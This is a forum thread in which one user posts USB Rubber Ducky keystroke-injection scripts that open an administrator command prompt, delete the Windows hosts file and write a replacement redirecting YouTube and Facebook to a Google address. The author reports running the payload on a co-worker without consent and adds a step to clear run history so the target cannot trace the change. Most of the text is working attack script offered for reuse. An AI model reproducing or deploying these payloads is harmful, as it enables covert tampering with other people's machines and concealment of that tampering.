TakkeX Posted April 13, 2014 Share Posted April 13, 2014 Ello everyone,I am very new with the ducky, and I am looking for some help.As I understand, powershell must be installed for any of the "Duck Toolkit" payloads to work. I was interested in DNS poisioning, but I cant get it to work correctly. I even tried to remove the command prompt section and have an administrative cmd already up and running before I plugged in my ducky. Everything went smoothly, but it still did nothing. I have disabled all my anti-virus programs and even tried a few random other DNS poisioning/host mod scripts that I randomly found on here and other websites. No luck.Is there a way to: 1. copy "hosts.txt" (pre-created file) from my single ducky sd card to the \Windows\System32\drivers\etc folder 2. delete "hosts" file in \Windows\System32\drivers\etc folder 3. rename "hosts.txt" to just "hosts"Please, no powershell. It seems pretty simple, but I still have no idea what I am doing. Quote Link to comment Share on other sites More sharing options...
TakkeX Posted April 15, 2014 Author Share Posted April 15, 2014 Since no one wanted to help, I did it all myself. Can anyone clean this up a bit? I am guessing that I made this too complicated. It is designed for Win XP and Win 7. Change hosts file (read-only) to redirect Youtube + Facebook to Google. DELAY 3000DEFAULT_DELAY 250GUI rSTRING %WINDIR%\SYSTEM32\DRIVERS\ETC\ENTERCONTROL ASHIFT F10STRING RDELAY 500SPACEENTERENTERDELAY 1000LEFTENTERDELAY 1000ALT F4GUI dCONTROL NALT fSTRING WDELAY 500STRING SDELAY 500STRING CMD.EXEENTERSTRING COMMANDPROMPTENTERDELAY 500STRING COMMANDPROMPTSHIFT F10STRING AENTERDELAY 750LEFTENTERDELAY 750STRING DEL %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTSENTERDELAY 500STRING %windir%\system32\notepad.exeENTERDELAY 500DEFAULT_DELAY 0STRING # cOPYRIGHT © 1993-2009 mICROSOFT cORP.ENTERSTRING #ENTERSTRING # tHIS IS A SAMPLE hosts FILE USED BY mICROSOFT tcp/ip FOR wINDOWS.ENTERSTRING #ENTERSTRING # tHIS FILE CONTAINS THE MAPPINGS OF ip ADDRESSES TO HOST NAMES. eACHENTERSTRING # ENTRY SHOULD BE KEPT ON AN INDIVIDUAL LINE. tHE ip ADDRESS SHOULDENTERSTRING # BE PLACED IN THE FIRST COLUMN FOLLOWED BY THE CORRESPONDING HOST NAME.ENTERSTRING # tHE ip ADDRESS AND THE HOST NAME SHOULD BE SEPARATED BY AT LEAST ONEENTERSTRING # SPACE.ENTERSTRING #ENTERSTRING # aDDITIONALLY, COMMENTS (SUCH AS THESE) MAY BE INSERTED ON INDIVIDUALENTERSTRING # LINES OR FOLLOWING THE MACHINE NAME DENOTED BY A '#' SYMBOL.ENTERSTRING #ENTERSTRING # fOR EXAMPLE:ENTERSTRING #ENTERSTRING # 102.54.94.97 RHINO.ACME.COM # SOURCE SERVERENTERSTRING # 38.25.63.10 X.ACME.COM # X CLIENT HOSTENTERENTERSTRING # LOCALHOST NAME RESOLUTION IS HANDLED WITHIN dns ITSELF.ENTERSTRING # 127.0.0.1 LOCALHOSTENTERSTRING # ::1 LOCALHOSTENTERENTERSTRING 74.125.228.97 YOUTUBE.COMENTERSTRING 74.125.228.97 WWW.YOUTUBE.COMENTERSTRING 74.125.228.97 FACEBOOK.COMENTERSTRING 74.125.228.97 WWW.FACEBOOK.COMENTERDEFAULT_DELAY 250CONTROL SSTRING %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTSENTERDELAY 1000ALT F4DELAY 500STRING RENAME %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS.TXT HOSTSENTERDELAY 500STRING EXITENTERALT F4GUI dCONTROL NSTRING COMMANDPROMPTDELETEENTERALT F4 Change hosts file (write access) to redirect Youtube + Facebook to Google. DELAY 3000DEFAULT_DELAY 250 GUI dCONTROL NALT fSTRING WDELAY 500STRING SDELAY 500STRING CMD.EXEENTERSTRING COMMANDPROMPTENTERDELAY 500STRING COMMANDPROMPTSHIFT F10STRING AENTERDELAY 750LEFTENTERDELAY 750STRING DEL %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTSENTERDELAY 500STRING %windir%\system32\notepad.exeENTERDELAY 500DEFAULT_DELAY 0STRING # cOPYRIGHT © 1993-2009 mICROSOFT cORP.ENTERSTRING #ENTERSTRING # tHIS IS A SAMPLE hosts FILE USED BY mICROSOFT tcp/ip FOR wINDOWS.ENTERSTRING #ENTERSTRING # tHIS FILE CONTAINS THE MAPPINGS OF ip ADDRESSES TO HOST NAMES. eACHENTERSTRING # ENTRY SHOULD BE KEPT ON AN INDIVIDUAL LINE. tHE ip ADDRESS SHOULDENTERSTRING # BE PLACED IN THE FIRST COLUMN FOLLOWED BY THE CORRESPONDING HOST NAME.ENTERSTRING # tHE ip ADDRESS AND THE HOST NAME SHOULD BE SEPARATED BY AT LEAST ONEENTERSTRING # SPACE.ENTERSTRING #ENTERSTRING # aDDITIONALLY, COMMENTS (SUCH AS THESE) MAY BE INSERTED ON INDIVIDUALENTERSTRING # LINES OR FOLLOWING THE MACHINE NAME DENOTED BY A '#' SYMBOL.ENTERSTRING #ENTERSTRING # fOR EXAMPLE:ENTERSTRING #ENTERSTRING # 102.54.94.97 RHINO.ACME.COM # SOURCE SERVERENTERSTRING # 38.25.63.10 X.ACME.COM # X CLIENT HOSTENTERENTERSTRING # LOCALHOST NAME RESOLUTION IS HANDLED WITHIN dns ITSELF.ENTERSTRING # 127.0.0.1 LOCALHOSTENTERSTRING # ::1 LOCALHOSTENTERENTERSTRING 74.125.228.97 YOUTUBE.COMENTERSTRING 74.125.228.97 WWW.YOUTUBE.COMENTERSTRING 74.125.228.97 FACEBOOK.COMENTERSTRING 74.125.228.97 WWW.FACEBOOK.COMENTERDEFAULT_DELAY 250CONTROL SSTRING %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTSENTERDELAY 1000ALT F4DELAY 500STRING RENAME %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS.TXT HOSTSENTERDELAY 500STRING EXITENTERALT F4GUI dCONTROL NSTRING COMMANDPROMPTDELETEENTERALT F4 Quote Link to comment Share on other sites More sharing options...
TakkeX Posted April 17, 2014 Author Share Posted April 17, 2014 After messing around with it a little bit, I cleaned it up.Then I successfully tested it on a lazy co-worker who surfs the net all day. :D This is written to have caps-lock on while running (not necessary), and the first script will "clear" the run history to prevent the target from locating the problem. Using this script the first time, the host files will be read-only. Use this: DELAY 3000DEFAULT_DELAY 250GUI rSTRING %WINDIR%\SYSTEM32\DRIVERS\ETC\ENTERCONTROL ASHIFT F10STRING RDELAY 500SPACEENTERENTERDELAY 1000LEFTENTERDELAY 1000ALT F4CONTROL ESCAPEDELAY 500STRING cmdDELAY 500MENUDELAY 500STRING AENTERDELAY 750LEFTENTERDELAY 750STRING DEL %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTSENTERDELAY 500STRING %windir%\system32\notepad.exeENTERDELAY 500DEFAULT_DELAY 0STRING # cOPYRIGHT © 1993-2009 mICROSOFT cORP.ENTERSTRING #ENTERSTRING # tHIS IS A SAMPLE hosts FILE USED BY mICROSOFT tcp/ip FOR wINDOWS.ENTERSTRING #ENTERSTRING # tHIS FILE CONTAINS THE MAPPINGS OF ip ADDRESSES TO HOST NAMES. eACHENTERSTRING # ENTRY SHOULD BE KEPT ON AN INDIVIDUAL LINE. tHE ip ADDRESS SHOULDENTERSTRING # BE PLACED IN THE FIRST COLUMN FOLLOWED BY THE CORRESPONDING HOST NAME.ENTERSTRING # tHE ip ADDRESS AND THE HOST NAME SHOULD BE SEPARATED BY AT LEAST ONEENTERSTRING # SPACE.ENTERSTRING #ENTERSTRING # aDDITIONALLY, COMMENTS (SUCH AS THESE) MAY BE INSERTED ON INDIVIDUALENTERSTRING # LINES OR FOLLOWING THE MACHINE NAME DENOTED BY A '#' SYMBOL.ENTERSTRING #ENTERSTRING # fOR EXAMPLE:ENTERSTRING #ENTERSTRING # 102.54.94.97 RHINO.ACME.COM # SOURCE SERVERENTERSTRING # 38.25.63.10 X.ACME.COM # X CLIENT HOSTENTERENTERSTRING # LOCALHOST NAME RESOLUTION IS HANDLED WITHIN dns ITSELF.ENTERSTRING # 127.0.0.1 LOCALHOSTENTERSTRING # ::1 LOCALHOSTENTERENTERSTRING 74.125.228.97 YOUTUBE.COMENTERSTRING 74.125.228.97 WWW.YOUTUBE.COMENTERSTRING 74.125.228.97 FACEBOOK.COMENTERSTRING 74.125.228.97 WWW.FACEBOOK.COMENTERDEFAULT_DELAY 250CONTROL SSTRING %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTSENTERDELAY 1000ALT F4DELAY 500STRING RENAME %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS.TXT HOSTSENTERDELAY 500STRING EXITENTERDELAY 500GUI rSTRING MSCONFIGENTERDELAY 750ALT F4 After using the previous script once, the host files will be read-write. Use this: DELAY 3000DEFAULT_DELAY 250CONTROL ESCAPEDELAY 500STRING cmdDELAY 500MENUDELAY 500STRING AENTERDELAY 750LEFTENTERDELAY 750STRING DEL %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTSENTERDELAY 500STRING %windir%\system32\notepad.exeENTERDELAY 500DEFAULT_DELAY 0STRING # cOPYRIGHT © 1993-2009 mICROSOFT cORP.ENTERSTRING #ENTERSTRING # tHIS IS A SAMPLE hosts FILE USED BY mICROSOFT tcp/ip FOR wINDOWS.ENTERSTRING #ENTERSTRING # tHIS FILE CONTAINS THE MAPPINGS OF ip ADDRESSES TO HOST NAMES. eACHENTERSTRING # ENTRY SHOULD BE KEPT ON AN INDIVIDUAL LINE. tHE ip ADDRESS SHOULDENTERSTRING # BE PLACED IN THE FIRST COLUMN FOLLOWED BY THE CORRESPONDING HOST NAME.ENTERSTRING # tHE ip ADDRESS AND THE HOST NAME SHOULD BE SEPARATED BY AT LEAST ONEENTERSTRING # SPACE.ENTERSTRING #ENTERSTRING # aDDITIONALLY, COMMENTS (SUCH AS THESE) MAY BE INSERTED ON INDIVIDUALENTERSTRING # LINES OR FOLLOWING THE MACHINE NAME DENOTED BY A '#' SYMBOL.ENTERSTRING #ENTERSTRING # fOR EXAMPLE:ENTERSTRING #ENTERSTRING # 102.54.94.97 RHINO.ACME.COM # SOURCE SERVERENTERSTRING # 38.25.63.10 X.ACME.COM # X CLIENT HOSTENTERENTERSTRING # LOCALHOST NAME RESOLUTION IS HANDLED WITHIN dns ITSELF.ENTERSTRING # 127.0.0.1 LOCALHOSTENTERSTRING # ::1 LOCALHOSTENTERENTERSTRING 74.125.228.97 YOUTUBE.COMENTERSTRING 74.125.228.97 WWW.YOUTUBE.COMENTERSTRING 74.125.228.97 FACEBOOK.COMENTERSTRING 74.125.228.97 WWW.FACEBOOK.COMENTERDEFAULT_DELAY 250CONTROL SSTRING %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTSENTERDELAY 1000ALT F4DELAY 500STRING RENAME %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS.TXT HOSTSENTERDELAY 500STRING EXITENTER Quote Link to comment Share on other sites More sharing options...
TakkeX Posted April 17, 2014 Author Share Posted April 17, 2014 On a side note, you may want to also add a third redirect to the list. The "mobile" site was still accessible, but this should clear it up. Depending on how many sites you want to redirect, the second script should take about 40 seconds. STRING 74.125.228.97 FACEBOOK.COMENTERSTRING 74.125.228.97 WWW.FACEBOOK.COMENTER STRING 74.125.228.97 MOBILE.FACEBOOK.COMENTER Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.